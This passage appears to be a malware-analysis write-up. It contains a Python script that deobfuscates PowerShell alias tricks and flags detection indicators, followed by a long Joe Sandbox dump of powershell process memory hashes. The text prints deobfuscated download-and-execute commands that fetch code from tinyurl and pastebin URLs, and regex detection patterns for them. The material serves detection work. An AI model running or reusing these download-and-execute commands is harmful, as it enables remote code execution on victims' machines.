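    # Expand $env:NAME so the alias *name* defined via the environment becomes visible.
    body = re.sub(r"\$env:(\w+)", lambda m: ENV.get(m.group(1).lower(), m.group(0)), body)
    aliases, rest = {}, []
    for stmt in (s.strip() for s in body.split(";")):
        if not stmt:
            continue
        m = SAL.match(stmt)
        if m:
            name, target = m.group(1), m.group(2)
            # Resolve through built-ins, then through aliases defined earlier in the script.
            aliases[name.lower()] = BUILTIN.get(target.lower(), aliases.get(target.lower(), target))
        else:
            rest.append(stmt)
    if aliases:
        names = re.compile(r"\b(" + "|".join(map(re.escape, aliases)) + r")\b", re.IGNORECASE)
        rest = [names.sub(lambda m: aliases[m.group(1).lower()], s) for s in rest]
    deob = "; ".join(rest)
    hits = URL.findall(deob)
    urls = [host + (path or "") for host, path in hits]
    indicators = []
    if re.search(r"\bsal\s+\$env:", raw, re.IGNORECASE):
        indicators.append("alias-name-from-env-var")
    if "Invoke-Expression" in deob and "Invoke-WebRequest" in deob:
        indicators.append("iex-over-download")
    if any(host.lower() in SUSPECT_HOSTS for host, _ in hits):
        indicators.append("shortener-or-paste-host")
    if re.search(r"-w(?:indowstyle)?\s+h", cmdline, re.IGNORECASE):
        indicators.append("hidden-window")
    return {"aliases": aliases, "deobfuscated": deob, "urls": urls, "indicators": indicators}


if __name__ == "__main__":
    for sample in SAMPLES:
        r = resolve(sample)
        print(r["deobfuscated"], r["urls"], r["indicators"])
```

Run against the first sample the script reduces to `Invoke-Expression(Invoke-WebRequest('tinyurl.com/yeykydun') -usebasicparsing)`; the second reduces to the same shape with `pastebin.com/raw/sA04Mwk2`. Detection keyed on the literal strings `iex`, `IEX` or `Invoke-WebRequest` misses both, while `sal $env:` in a command line, or Set-Alias followed by a call through a freshly defined alias, has no benign reason to appear in a process-creation log.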
                                                              Execution Graph

                                                              Execution Coverage:2.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph: 7ffd34779fd4 -> 7ffd34779fdd (LoadLibraryExW) -> 7ffd3477a08d

                                                              Control-flow Graph

                                                              Control-flow graph (rendered as an image on the original page; legend: Executed / Not Executed): basic blocks 7ffd3476ee86 through 7ffd3476f343, including a call to 7ffd3476f344; node and edge list omitted.
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e65bdfe468c92c84df6f028ffb14d28cd1ab97fc9d81405bae5c2d5db129da33
                                                              • Instruction ID: 3587fce7e7cb46aecfb54cbef391047db13b55b493ae911c7c0842223fc40cb1
                                                              • Opcode Fuzzy Hash: e65bdfe468c92c84df6f028ffb14d28cd1ab97fc9d81405bae5c2d5db129da33
                                                              • Instruction Fuzzy Hash: 56F1A770A08A8D8FEBA8DF28C8557E977D2FF55310F04426EE84DC7295DF38A9458B81

                                                              Control-flow Graph

                                                              Control-flow graph (rendered as an image on the original page; legend: Executed / Not Executed): basic blocks 7ffd3476fc32 through 7ffd347700bf, including a call to 7ffd347700c0; node and edge list omitted.
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d30ed40c7075898d58290a330ce1cf08c917f95345d766aadf26d8d84bbc5e77
                                                              • Instruction ID: fb77cd24bb0fc6d90c065795306314fb270a8d7919287ea22579131145f01e63
                                                              • Opcode Fuzzy Hash: d30ed40c7075898d58290a330ce1cf08c917f95345d766aadf26d8d84bbc5e77
                                                              • Instruction Fuzzy Hash: 41E1A470A08A4E8FEBA8DF28C8657E977D2FF55310F14426ED84DC7291CB78A84587C1

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b5322a106664a8cb4c7399e968bc8fc9efba87a53448b9a2780f6d153238173
                                                              • Instruction ID: f0842330c5e7296580fb1a2cc94c9717b18f71dbfcfc920925afe263e3201a3a
                                                              • Opcode Fuzzy Hash: 1b5322a106664a8cb4c7399e968bc8fc9efba87a53448b9a2780f6d153238173
                                                              • Instruction Fuzzy Hash: 349185C3A0F6C25BF761866C1C65135BF91EF9726078840FBD6848B1D7A84CBD199BC2

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: a0a41f7dc6441ba2771bf7b8d35e4d3873c17882ca89e7aaaca41cfa8e42d6b4
                                                              • Instruction ID: 2937997b53badb6a6b32d4cf29437fdcf58726bec83c20d60b1a9e25055d5963
                                                              • Opcode Fuzzy Hash: a0a41f7dc6441ba2771bf7b8d35e4d3873c17882ca89e7aaaca41cfa8e42d6b4
                                                              • Instruction Fuzzy Hash: 9731E131A0CA4C8FDB19DBA88849AE9BBE0EF56321F04822FD009D3152DB74A416CB91

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9080ad41d1c4200a375b301ccd888a9814432de5c41a1c8748c86b6cbaf0ded8
                                                              • Instruction ID: 7f0dd567ecd9a7946e6b24797eaf59ca9ecd63e384fdb980e40c66448d78927b
                                                              • Opcode Fuzzy Hash: 9080ad41d1c4200a375b301ccd888a9814432de5c41a1c8748c86b6cbaf0ded8
                                                              • Instruction Fuzzy Hash: 2141E732B0CA494FEB94DB5C94A5AF9B7E1FF59310B14017FD54ED3292DA29E802C740

                                                              Control-flow Graph

                                                              Control-flow graph (rendered as an image on the original page; legend: Executed / Not Executed): basic blocks 7ffd34833b95 through 7ffd34833ca9; node and edge list omitted.
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a14a2eecdd61aa0494f0e6b2f437e7a69a34410d2fcf2ac904a0df7b2b274fad
                                                              • Instruction ID: 083150fdaaee9441322cb91ca80b529338d2e61037d369755c088a3f380a6365
                                                              • Opcode Fuzzy Hash: a14a2eecdd61aa0494f0e6b2f437e7a69a34410d2fcf2ac904a0df7b2b274fad
                                                              • Instruction Fuzzy Hash: 5241D232B0D94A4FEBA5EB5C94B16B8B7D1EF59310F1801BBD14EC7293DE1DA8429381
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O_^$O_^$O_^$O_^$O_^
                                                              • API String ID: 0-2660881393
                                                              • Opcode ID: 13a4ab43628fa1340e5a692a187f73b9a22f943e2739d710a97401f8e9b4cd92
                                                              • Instruction ID: 9865886cfce2f9e65c1211122b6ca4b7212475330b0389293394b3e444863e7c
                                                              • Opcode Fuzzy Hash: 13a4ab43628fa1340e5a692a187f73b9a22f943e2739d710a97401f8e9b4cd92
                                                              • Instruction Fuzzy Hash: 16416A97E0F6C29FE762462448B50A53FD6AF5323470B01F2C698DF193AE5C7807A692
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O_^$O_^$O_^$O_^$O_^
                                                              • API String ID: 0-2660881393
                                                              • Opcode ID: 9a025792913ff98d285c7f9ca4bc68a54c89254ce9ac5278f524f86dcf087091
                                                              • Instruction ID: 49e855d9bd00afd1c7476a1a909d78caf4460a9fa28804b7ff89e38eed268a2b
                                                              • Opcode Fuzzy Hash: 9a025792913ff98d285c7f9ca4bc68a54c89254ce9ac5278f524f86dcf087091
                                                              • Instruction Fuzzy Hash: C731A8D7E0FAC79BE362452808B50953BC6AF6337470B11B2C65CDB193AE4C38036282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 3880cffdd576601c80e5f160c1e36d1250379592d0a82463f5a525fc0da5e91b
                                                              • Instruction ID: 56cfa02b60c7d726c5d3d68e2f6b59ddc4b8c8410db59498da188e0df4cbee68
                                                              • Opcode Fuzzy Hash: 3880cffdd576601c80e5f160c1e36d1250379592d0a82463f5a525fc0da5e91b
                                                              • Instruction Fuzzy Hash: D2316787B0EBC29AF763412958BA1E93FD5DF9317170D11B7CAC5C6097AD0C284BA391
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 2950ce6ccc67f0a60a4e38f2344dfff72338abbfb1c6f1db77ff5753226f5061
                                                              • Instruction ID: 342d5121047c619a8f9143ab6cfbabcdaafcaa15842735e11d7af27a9f7c6a76
                                                              • Opcode Fuzzy Hash: 2950ce6ccc67f0a60a4e38f2344dfff72338abbfb1c6f1db77ff5753226f5061
                                                              • Instruction Fuzzy Hash: 413143C7B0EBC29AF763422918AA0E53FD5DF9317174D00B7CAC5C6097AD0D284AA392
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0acb75c55ae3226056c3ee181d51c56c0bbac33292078b2c2366df5bd3db61d0
                                                              • Instruction ID: 5feec1e663e025c77bee8caf8a9f72ffd6412e57a08e1b575745b2fc76068a07
                                                              • Opcode Fuzzy Hash: 0acb75c55ae3226056c3ee181d51c56c0bbac33292078b2c2366df5bd3db61d0
                                                              • Instruction Fuzzy Hash: 9312C3C3A0F6C25FF751822C1C691797FD1AF5325478980FBD6848B0DBA85CBD099782
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 435e597739f09f25d0b9c3fb362b7b3f8d8ab9699ad753c205b9f1f605b31c42
                                                              • Instruction ID: 77c3966082c24372d34315a455eff1391dab87690db2560dfea20e0c6bfeb964
                                                              • Opcode Fuzzy Hash: 435e597739f09f25d0b9c3fb362b7b3f8d8ab9699ad753c205b9f1f605b31c42
                                                              • Instruction Fuzzy Hash: 3112B283B0EAC24BF752862C1C69139BF91EB5325479844FBD694D70DBA84EBD0993C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 626b75f82a7d8cf191272b68d78cb210cb7badb91c8de56c7b21d5ab1a6c14bd
                                                              • Instruction ID: 2b6bfe7741196623dc008fefcfa5cad76245b4f81358c416241e19e3b2456e20
                                                              • Opcode Fuzzy Hash: 626b75f82a7d8cf191272b68d78cb210cb7badb91c8de56c7b21d5ab1a6c14bd
                                                              • Instruction Fuzzy Hash: 7EE1E8C3A0E6C29FE71146289C69139BF90AF5326074D45FBD694C70DB948CBD1A93C3
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a88ca30de6bfbee3419487125e38335e37517f48a5a7ccee1d84e29ac60833db
                                                              • Instruction ID: 6a08197fdba5e4b4ed7b4870dc8ea51bb6896be324840eb8e0e3b2fcc9cd2d5f
                                                              • Opcode Fuzzy Hash: a88ca30de6bfbee3419487125e38335e37517f48a5a7ccee1d84e29ac60833db
                                                              • Instruction Fuzzy Hash: 29C1F56670D6C19FE352A66D98B51E53FA1DFD323570808BBC684C61A3ED0D684BC3E2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 990de0f4d675e827577d1f41f86a1d2f882199e3c1e0f1e05e3e67e7b53fcfc9
                                                              • Instruction ID: 2d6beb86b31cd9f830ad31ecf83bb8613dd083ca38c15909e9c4f57b95569be2
                                                              • Opcode Fuzzy Hash: 990de0f4d675e827577d1f41f86a1d2f882199e3c1e0f1e05e3e67e7b53fcfc9
                                                              • Instruction Fuzzy Hash: E9D1F9C2A0E6C25BFB5186780C6A2797FA1EF53254B4840FBD294870DBD84EBD0D97C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5acee243265d7709578d810722cbbf4bcc36a7d6cda9f3378993eb010a150c80
                                                              • Instruction ID: b427928037ab10c4692c38ec8ead044c68157250d9f60b8a27bf3968edb4d206
                                                              • Opcode Fuzzy Hash: 5acee243265d7709578d810722cbbf4bcc36a7d6cda9f3378993eb010a150c80
                                                              • Instruction Fuzzy Hash: BAC13CC3B0E6C25BF711866C6C661B97F91EF4326578841FBD284CB0D7A84DB81A93C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b52c36002c45481afa8a69d41f34454141ed2ebbc0c17568b82c0993c0b4d5b
                                                              • Instruction ID: a4f60ccd1ac4e6e4a9038bd578dcf7a110122b1df65ab581601ea9a9e033a17a
                                                              • Opcode Fuzzy Hash: 9b52c36002c45481afa8a69d41f34454141ed2ebbc0c17568b82c0993c0b4d5b
                                                              • Instruction Fuzzy Hash: 84A10A83B0E6C25FF762826C5C661797F91EF4326578940FBD684CB0D7A84DB81993C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08ef97dec022019d54ffa4418e021afc68fe92a6d40764fa312e7af4f43a4fc9
                                                              • Instruction ID: d26dae440cc41c1edcf16cc38fa93d61013c953dd2ad93f00fe8a9b74620b62b
                                                              • Opcode Fuzzy Hash: 08ef97dec022019d54ffa4418e021afc68fe92a6d40764fa312e7af4f43a4fc9
                                                              • Instruction Fuzzy Hash: D571A497A0E9926BD32167BC78B30EA3B94DF4323D70D41B7D1C88D053AD0C285A9696
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0316be607b2cd29f0b1e8ed3a74f7717952556f1db719a605ddff6492efe510b
                                                              • Instruction ID: fa21b718ec235dc508b7b2fd4352f82347af854edd1a302c006f6c44330855f4
                                                              • Opcode Fuzzy Hash: 0316be607b2cd29f0b1e8ed3a74f7717952556f1db719a605ddff6492efe510b
                                                              • Instruction Fuzzy Hash: 8B718696A0D7E3DBE7528A2848FA0E57FE1EF5332471900BAC585C7093DA1D3816A691
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 292ccc40c346ab3c3705e78caea7335e708f79b36418ec6fd432567a0d7e243a
                                                              • Instruction ID: 3c48e3ab7fc0cf0db026510e51b8e768fe8259c3b1231640d8e1e0594b94990a
                                                              • Opcode Fuzzy Hash: 292ccc40c346ab3c3705e78caea7335e708f79b36418ec6fd432567a0d7e243a
                                                              • Instruction Fuzzy Hash: 50619787B0E6D297E322563C64F60EA7F95DF5323574941B7C6C4C90A7ED0C384BA2A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1bd45a9ca38a7fef1640c455ce7bf0285e7ae7dcab6f7c93e417e6943564066
                                                              • Instruction ID: af90d41d252fd43d973c77d7cb7217a54c908b61541125666f284611695b9acd
                                                              • Opcode Fuzzy Hash: f1bd45a9ca38a7fef1640c455ce7bf0285e7ae7dcab6f7c93e417e6943564066
                                                              • Instruction Fuzzy Hash: 8061D3C3A0F6C25BF651826C1CA9135AFE1AF5325479881FBD684DB0CBE84DBD0997C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f60d0a811881bff837a501735b8fdd4e55e3c09a57fd6255f3c0632a79324028
                                                              • Instruction ID: 61153e87028e2b36151a6236a32918380d70a002b5fee9e7fd3ff895d7b29921
                                                              • Opcode Fuzzy Hash: f60d0a811881bff837a501735b8fdd4e55e3c09a57fd6255f3c0632a79324028
                                                              • Instruction Fuzzy Hash: F5514D92A0D7D75EE7A256385CB50D93FA59F6323470A00F7CAC8CF097DE0C280AA252
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d30fc2fc1347d5251df2e5d0acc70783f8a2704ced7a217d262458b63722435e
                                                              • Instruction ID: 42f62b62dcf6578cdb1a63789ee0e79c0a4a23ecc26cfec2241ab37a04210c1a
                                                              • Opcode Fuzzy Hash: d30fc2fc1347d5251df2e5d0acc70783f8a2704ced7a217d262458b63722435e
                                                              • Instruction Fuzzy Hash: D141B5D2B0D7C39EE312962C68B60EA7F95DF83234B4940F7C5C9CA093DC1D6846D661
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31c16333f7121d8cd7cecc8623bf93505b1e39464953f9abcb20b2b35fa39f3
                                                              • Instruction ID: f299a63065ca02eca9d2906e2967c5dbe528b835042e3a19be860a3f7967a1f5
                                                              • Opcode Fuzzy Hash: c31c16333f7121d8cd7cecc8623bf93505b1e39464953f9abcb20b2b35fa39f3
                                                              • Instruction Fuzzy Hash: 66419E8BB4E6D25AE652512D68FA0D93F94DFD32B570910F7C785C70D3AC0E2C4BA2A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0179e4e11261bc914ac4b447a8cfa043e72d9d74dc54ce7b9b1df5b9abf562b0
                                                              • Instruction ID: 2183ec2d3baa6de83e2a374fd108089bb99e212eebec8c4d9c1089949e50bb9e
                                                              • Opcode Fuzzy Hash: 0179e4e11261bc914ac4b447a8cfa043e72d9d74dc54ce7b9b1df5b9abf562b0
                                                              • Instruction Fuzzy Hash: D841C7D6A0D7C26AD313523918F60DA7F95DF53278B0D00F7C6D8CA093AD0D284AA6A2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0328f295ac66053d3876e34dacf2a701add2e53708bbbd514123a9dcd8dde279
                                                              • Instruction ID: 6ea3e36e2cc8b009ee0f6934545db76415c5e6be4bd8f18c32170ea8eab7d076
                                                              • Opcode Fuzzy Hash: 0328f295ac66053d3876e34dacf2a701add2e53708bbbd514123a9dcd8dde279
                                                              • Instruction Fuzzy Hash: 104179D6A0DBC39AD313523D18F50D5BF92EF9327970801F6C698CA1C3BD0C396A9692
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08c1879fbc56b7adc7c984cda0a5b63f825ab14ad0141810c3543dc4d30b0373
                                                              • Instruction ID: 6d737b238f7bb5945767cfe54134c683b63993aba1cbc880dbe4c4127cee1ff7
                                                              • Opcode Fuzzy Hash: 08c1879fbc56b7adc7c984cda0a5b63f825ab14ad0141810c3543dc4d30b0373
                                                              • Instruction Fuzzy Hash: D741749790D7D29AE752862C5CEE0D57F95FF13264B0900FBC6898B093EE1D2816D391
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78bb376fe4877b4de9d5794c9f04aaf23171db290218c5dbfea98f9297984eb4
                                                              • Instruction ID: b31fefe572f737d18e7762418b7cfa85722e1e78f666d0804648b8befaa43b74
                                                              • Opcode Fuzzy Hash: 78bb376fe4877b4de9d5794c9f04aaf23171db290218c5dbfea98f9297984eb4
                                                              • Instruction Fuzzy Hash: C141B882E0E6C29FE75287344C6E1797F94AF4325079944FECA85CB097E84C6D2993D3
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6e4be232f623c5b33c1cc19bdac701bb01fe5cdc50822f9668af0341a7eeea4
                                                              • Instruction ID: 5ba748f04596ea7cab8bfa73325ed9e6ac716575f197f6e20f39f903ea3ca837
                                                              • Opcode Fuzzy Hash: c6e4be232f623c5b33c1cc19bdac701bb01fe5cdc50822f9668af0341a7eeea4
                                                              • Instruction Fuzzy Hash: A231D88148F3C25FD39383B499755827FF55E47124B4E81EBC5C4CE8A3D58E588AD362

                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                               execution_graph (3 nodes):
                                                               • Node 9633: 7ffd34796c34
                                                               • Node 9634: 7ffd34796c3d LoadLibraryExW
                                                               • Node 9636: 7ffd34796ced
                                                               • Edges: 9633->9634, 9634->9636

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3215828140.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34780000_powershell.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: f55b522753654025210d13819d7cfd71dc2f84ecb033aa76889b8d5b4bd7171b
                                                              • Instruction ID: 82a72eaefe3b37cc891378053c261e62855058ac6e73522f9c771dff28f5a2a0
                                                              • Opcode Fuzzy Hash: f55b522753654025210d13819d7cfd71dc2f84ecb033aa76889b8d5b4bd7171b
                                                              • Instruction Fuzzy Hash: 4131F37190CA5C8FDB19DFA89889AE9BBE0FF56320F04822BD009D3152CB74A415CB91

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1A_L
                                                              • API String ID: 0-1522723599
                                                              • Opcode ID: 37eb0f9dd2c73a8fd17d7bb6dd4a6edd2fb73aa65e84e0b96131b5d8e449842f
                                                              • Instruction ID: c0ae480b25b255ae98e40409075672cb683692529fba253d0c9772f0099953dc
